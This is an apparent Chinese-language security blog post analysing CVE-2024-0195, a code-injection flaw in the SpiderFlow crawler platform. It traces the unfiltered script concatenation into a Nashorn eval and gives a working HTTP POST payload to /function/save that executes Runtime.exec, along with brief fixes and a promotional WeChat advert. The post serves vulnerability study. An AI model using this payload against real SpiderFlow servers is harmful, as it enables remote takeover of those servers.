首页 > 其他分享 >SpiderFlow爬虫平台漏洞利用分析(CVE-2024-0195)

SpiderFlow爬虫平台漏洞利用分析(CVE-2024-0195)

时间:2024-01-18 20:45:23浏览次数:43  
标签:java String parameters script functionName spider 2024 SpiderFlow 0195

1. 漏洞介绍

SpiderFlow爬虫平台项目中

spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionNameparameters 或 script 中的内容,从而构造恶意输入来执行任意的 JavaScript 代码,从而导致代码注入,并允许远程发起攻击,可导致服务器失陷。

2. 流程图分析

image-20240113214637085

3. 搭建过程

1. IDEA Gitee 快速搭建

image-20240113214746379

URL : https://gitee.com/jmxd/spider-flow.git

image-20240113214828184

2. 数据库搭建

我这里使用的是MySQL5.7,然后使用Navicat运行项目中spider-flow\db\spiderflow.sql这个SQL文件会在数据库中自动生成所需要的数据库:

image-20240113215141449

image-20240113215223454

image-20240113215235300

image-20240113215310529

3. 数据库连接

image-20240113215340735

然后修改数据库配置文件application.properties,路径为:spider-flow\spider-flow-web\src\main\resources\application.properties

image-20240113215518996

4. 运行

spider-flow\spider-flow-web\src\main\java\org\spiderflow\SpiderApplication.java

image-20240113215638797

然后访问路径http://localhost:8088/,成功搭建!

image-20240113215752537

4. 利用过程

首先我们直接在IDEA中寻找危险函数eval,使用Ctrl+shift+F文件搜索:

image-20240113220036696

发现这里有个validScript函数调用了eval危险函数:

    public static void validScript(String functionName,String parameters,String script) throws Exception {
        new ScriptEngineManager().getEngineByName("nashorn").eval(concatScript(functionName,parameters,script));
    }

然后这里的我们去看看eval具体执行的参数是怎么生成的:

image-20240113220311948

    private static String concatScript(String functionName,String parameters,String script){
        StringBuffer scriptBuffer = new StringBuffer();
        scriptBuffer.append("function ")
                .append(functionName)
                .append("(")
                .append(parameters == null ? "" : parameters)
                .append("){")
                .append(script)
                .append("}");
        return scriptBuffer.toString();
    }

可以看到concatScript 方法中,它接受三个参数 functionNameparameters 和 script,然后将它们拼接成一个 JavaScript 函数的字符串。这里它没有任何的过滤。所以我们可以尝试构造恶意的这三个参数实现RCE。

【----帮助网安学习,以下所有学习资料免费领!加vx:dctintin,备注 “博客园” 获取!】

 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)

在上面的函数中将产生如下的字符串:

function functionName(parameters){script}

很明显我们可以构造恶意的script来导致RCE:

例如script的值可以为}Java.type('java.lang.Runtime').getRuntime().exec('calc');{

这样的话我们最终的字符串将会变成:

function functionName(parameters){}Java.type('java.lang.Runtime').getRuntime().exec('calc');{}

然后最后在执行的时候就会直接定义一个函数后执行我们的Java恶意代码。

然后我们分析是哪个函数调用了validScript函数

image-20240113221705800

    public String saveFunction(Function entity) {
        try {
            ScriptManager.validScript(entity.getName(),entity.getParameter(),entity.getScript());
            super.saveOrUpdate(entity);
            init();
            return null;
        } catch (Exception e) {
            logger.error("保存自定义函数出错",e);
            return ExceptionUtils.getStackTrace(e);
        }
    }

然后在FunctionController.java调用了saveFunction

@RestController
@RequestMapping("/function")
public class FunctionController {
    ......
    @RequestMapping("/save")
    public String save(Function function){
        return functionService.saveFunction(function);
    }
    ......
}

然后我们现在就可以去实际的功能点看需要哪些参数:

image-20240113223447553

image-20240113223535043

于是我们直接写出payload:

POST /function/save HTTP/1.1
Content-Length: 38
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: localhost:8088
​
id=&name=rce&parameter=rce&script=}Java.type('java.lang.Runtime').getRuntime().exec('calc');{

成功命令执行弹出计算器:

cve-2024-1

修复方式

  • 过滤好script参数

  • 设置沙箱

5. 总结

这个项目在Gitee上面有7.4K的Star,有3.6K的fork记录,在实际部署上也不是很少,但是漏洞点出的不是很难主要是思路扩展,适宜入门。

更多网安技能的在线实操练习,请点击这里>>

  

标签:java,String,parameters,script,functionName,spider,2024,SpiderFlow,0195
From: https://www.cnblogs.com/hetianlab/p/17973367

相关文章

  • 2024/1/18学习进度笔记
    今天研究了外包杯的题目。我们做的主要是一个虚拟数字人的项目,这里记录下在windows上配置pytorch3d以及freqencoder,gridencoder,raymarchingshencoder这几个库的过程首先这几个库是用过setup.py进行安装的,也就是pythonsetup.pyinstall安装前电脑里必须要装好了VisualStu......
  • 【杂题乱写】2024.01 #2
    AtCoder-JOIOPEN2022_Aシーソー开局考虑二分,然后不会做,没想到不需要二分。以初始的重心为基准,记为\(mid\),可以对操作\(i\)次得到的所有可能区间求出重心在\(mid\)左侧且最靠右的以及在\(mid\)右侧且最靠左的两个区间,容易发现这两个区间左右端点都差\(1\),记靠左的一个......
  • 20240118
    该卷卷啦再摆烂不能要了A.游戏其实我10月份做过这道题自己做了忘了再做还读错30min题容易想到,操作次数之和最后一个不为其它数倍数的数的位置有关那么,先考虑筛法把所有这样的数找出来,设共有\(x\)个然后显然就可以枚举最后一个的位置,然后组合更强的结论为\[\frac{x}{x......
  • 【2024.01.18】RSS的部署和使用
    ===在这个信息杂乱的时代,需要RSS的存在来帮助我们整合信息这样子我就可以不用开B站看关注的人的信息,打开博客去看别人的博文,打开什么值得买看最新的榜单而是统统全在一个程序内看完所有的信息完整的RSS需要有RSS阅读源,RSS服务器,RSS阅读器RSS阅读器我选择的是FluentReader,颜......
  • 2024面试题分享
    一、技术类1、你项目中的分布式系统如何实现请求的幂等性?2、Nacos的服务注册发现原理是怎样的?服务注册表的结构是怎样的?注册一个服务的流程是怎样的?3、Linux如何查询一个应用占用的磁盘和内存大小?4、SpringBean的生命周期?5、Spring数据库事务的传播方式由几种,在A类里的M1方法......
  • 2024年1月【考试战报】|ORACLE OCP 19C考试通过
    2023年12月【考试战报】ORACLEOCP19C考试通过2023年11月【考试战报】|ORACLEOCP19C考试通过2024年10月【考试战报】|ORACLEOCP19C考试通过203年8月【考试战报】|ORACLEOCP19C考试通过数据库工程师-OracleOCP19C认证介绍ORACLE 2024年新年考试战报恭喜顺利拿证新......
  • 2024年首次更新!微信iOS 8.0.46发布:手机空间清理更方便、看广告免费听VIP音乐
    从微信官网获悉,日前,微信iOS版发布8.0.46正式版更新,这是iOS版2024年的首次更新。更新日志还是熟悉的那几个字:“修复了一些已知问题。”根据实测,微信在8.0.46版本中新增了一项比较实用的功能。具体来看,微信iOS8.0.46版将原本不可删除的“其他数据”拆分,新增“资源文件和其他账......
  • 2024.1.18-每日进度笔记
    今天,我主要尝试了通过摄像头拍照并保存在本地指定文件。 参考:百度文心一言的回复。 <%@pagelanguage="java"contentType="text/html;charset=UTF-8"pageEncoding="UTF-8"%><!DOCTYPEhtml><html><head><title>获取摄像头画面并拍照</title......
  • 【2024-01-17】连岳摘抄
    23:59我们无法将习惯抛出窗外,但我们可以让习惯一阶阶地下楼。                                                 ——马克·吐温自私的根源在于吝啬。孔子说过,就是像......
  • 恒驰喜讯荣获华为云优秀服务伙伴奖!华为云生态大会2024开启联合解决方案新篇章
    1月15日-16日,以“领航新开局,共赢新生态”为主题的华为云生态大会2024在华为云贵安数据中心·云上屯隆重启幕。华为云和全国生态伙伴、开发者,在新年伊始,共同见证华为云生态战略的新进展、伙伴政策的新升级,分享源自优秀生态伙伴的标杆案例和心得,探讨如何继续发挥生态力量,打造数智时代......